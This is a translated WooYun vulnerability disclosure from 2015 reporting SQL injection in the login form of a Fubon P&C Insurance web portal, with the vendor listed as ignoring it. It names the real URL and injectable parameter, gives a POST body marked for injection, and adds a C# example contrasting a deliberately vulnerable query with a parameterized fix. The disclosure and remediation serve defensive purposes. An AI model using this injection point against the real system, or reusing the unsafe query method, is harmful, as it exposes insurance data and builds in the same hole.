
Vulnerability summary

Defect ID: wooyun-2015-0141901

Title: SQL injection in a Fubon P&C Insurance system (16 sensitive databases, 14,000+ tables)

Vendor: Fubon P&C Insurance (富邦财险)

Author: 路人甲

Submitted: 2015-09-22 07:37

Fixed: 2015-09-27 07:38

Disclosed: 2015-09-27 07:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organisation (CNCERT, the national internet emergency response centre) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-22: Details sent to the vendor; awaiting the vendor's response
2015-09-27: The vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

The loneliness of ten thousand-plus tables, you know the feeling.

Detailed description:

Affected site: https://eip.fubon.com.cn/
The login form is vulnerable to SQL injection.

https://eip.fubon.com.cn/Login.aspx
POST body (the injectable parameter is IDD): IDD=admin*&Password=11111&x=43&y=31&CharSet=UTF-8&SYSTEM_CharSet=UTF-8


(screenshot: 12.png)


Current database: PowerEIP. There are far too many tables to list, so only part of the listing is pasted here.

Database: PowerEIP
[14177 tables]


Proof of vulnerability:

(screenshot: 13.png)

Fix recommendation:

Filter input.
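Filtering alone is fragile; the standard fix for a login endpoint like the one described (an ASP.NET page taking IDD and Password) is a parameterized query. The block below is an added example, not code from the report or from the vendor's system: it shows the concatenated form that makes IDD injectable next to its hardened form. The table and column names (Users, IDD, PasswordHash) and the parameter lengths are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not the vendor's code. Schema names are assumed.
public static class LoginRepository
{
    // VULNERABLE: the IDD value is spliced into the SQL text, so anything the
    // client sends in that field (the report marks it with "admin*") reaches the
    // SQL parser as syntax rather than as data.
    public static bool LoginUnsafe(SqlConnection conn, string idd, string passwordHash)
    {
        string sql = "SELECT COUNT(*) FROM Users WHERE IDD = '" + idd +
                     "' AND PasswordHash = '" + passwordHash + "'";
        using (var cmd = new SqlCommand(sql, conn))
        {
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // HARDENED: the query text is a constant; both values travel as typed
    // parameters, so quotes, comment markers or UNION fragments inside IDD are
    // compared as literal text and can never change the statement.
    public static bool LoginSafe(SqlConnection conn, string idd, string passwordHash)
    {
        const string sql =
            "SELECT COUNT(*) FROM Users WHERE IDD = @idd AND PasswordHash = @hash";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@idd", SqlDbType.NVarChar, 64).Value = idd;
            cmd.Parameters.Add("@hash", SqlDbType.NVarChar, 128).Value = passwordHash;
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

Independently of the query fix, the fact that 16 databases were reachable from the login page means the application's database login had far broader rights than a portal needs; restricting that account to the PowerEIP objects the portal actually uses limits what any remaining injection can read.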

Copyright notice: when reproducing, please credit the source 路人甲@乌云 (WooYun).


Vendor response

Vendor's response:

Severity: No impact, vendor ignored

Ignored on: 2015-09-27 07:38

Vendor reply:

Vulnerability Rank: 15 (WooYun assessment)

Latest status:

None